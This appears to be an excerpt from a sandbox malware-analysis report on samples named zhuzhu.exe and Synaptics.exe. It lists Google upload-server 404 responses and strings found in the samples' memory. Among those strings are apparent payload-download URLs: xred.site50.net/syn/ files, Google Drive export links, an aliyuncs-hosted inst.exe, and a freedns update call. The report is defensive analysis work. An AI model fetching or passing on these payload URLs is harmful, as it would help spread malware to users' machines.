                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6sEKpj7K2JTFM2i5m0S7mYHMXxHbY36vpIt1vd315tHLee4YA71LlDnZupTa_o8C0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-InuDqAYtm78iwzwKmEjFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WHAfbb6IRukLwpSyevePuFa4_SwhQJjEJNRHx1Q3Kri0GfJRN-pdJ1paAks6hZvA2f4n-uQkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-HXdeOlWWtJ0GBordlk7n-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KS1-8RPzB0Lv_c7iLtGFjZmcKJK3jBAYNptdA-urt_pRg2CNGOwwelOHjaa4LRS7WContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:37 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zQZnxz-jdoHytkoMnTSKRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ZyLoaYjCr-Jc-XrvFVN_QOa0zg5rYUjXF4yWWiBX3CVdzOKfd-BS-ozphNGTKaaArContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:37 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j_HjNlZEvZlwl8B9WK6kXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7bJ4bfnRhBPw_5gdvkn38o9n-HGASA01bBjYi9cjCIaeYr6GIFmYrE8kWYBt8F8qCJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-O9mM0oBOnTbNGYipsUvkVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6fptvrk1rvcYhu9jn_A5I3uskYgEv56SDRQsBG9qB8z09MvacwwCAFBmhWyas9wo9KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:39 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Isq4iJRQMKS29y9Gs5d_yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Zxc7tYAlHhm3Sl77wooeKkIH811kdZ9aOsB6hjMeCyxw-L5qs44kL-oQo3zyXE2cMx5lRBc4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-j_LKLvuLRj2wyuyAUeO4VA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC482Q6VrHTYGQ-osPbIpHMT_R9Ji_mfmQzjEyT4jKQEmC_X8p7dzHgHgDYhbPigdfGfTFvT4zsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:40 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ow8qcLUkI1nnVjHb151auw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kL-iL-oTdn4qTI2omROexovcwtBgGLqnkwBpQcc3WmZIPk8V1r52lVFeoCdfccpTDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:41 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gVpoI4Tv-OnyM5LOkA2eFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771077383.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1779229502.0000000005DCB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.dr String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771077383.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1779229502.0000000005DCB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771077383.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.dr String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.dr String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.dr String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/
Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B23000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000004.00000002.4138120900.000000000019D000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe
Source: ._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe)
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeD
Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeg
Source: ._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exel
Source: ._cache_zhuzhu.exe, 00000001.00000002.1772550299.000000000019A000.00000004.00000010.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1772613360.0000000000400000.00000040.00000001.01000000.00000005.sdmp, ._cache_zhuzhu.exe, 00000004.00000002.4138120900.000000000019D000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep
Source: ._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exet
Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/t
Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000069C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/H
Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/L
Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/T
Source: Synaptics.exe, 00000002.00000002.2535106563.000000001CFAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/cellem
Source: Synaptics.exe, 00000002.00000002.2549473645.000000002303E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2487297293.000000001034E000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0;
Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2540484915.000000001F4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2565739071.0000000026EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2463201938.00000000093CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2502599771.0000000013EFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2485503379.000000000EE0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2504843098.000000001593E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2472302816.000000000AF4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2516691595.000000001BBFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2517150545.000000001BFBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445443299.0000000004E9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2548846592.0000000022C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2536484406.000000001D6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2460777029.000000000838E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2472762472.000000000B58E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2460193517.000000000810E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2485284455.000000000EB8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 
00000002.00000002.2536925382.000000001DA7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2515598461.000000001B83E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2510415975.000000001917E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%/
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%k$
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%q
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%z
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.0000000000675000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&k
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
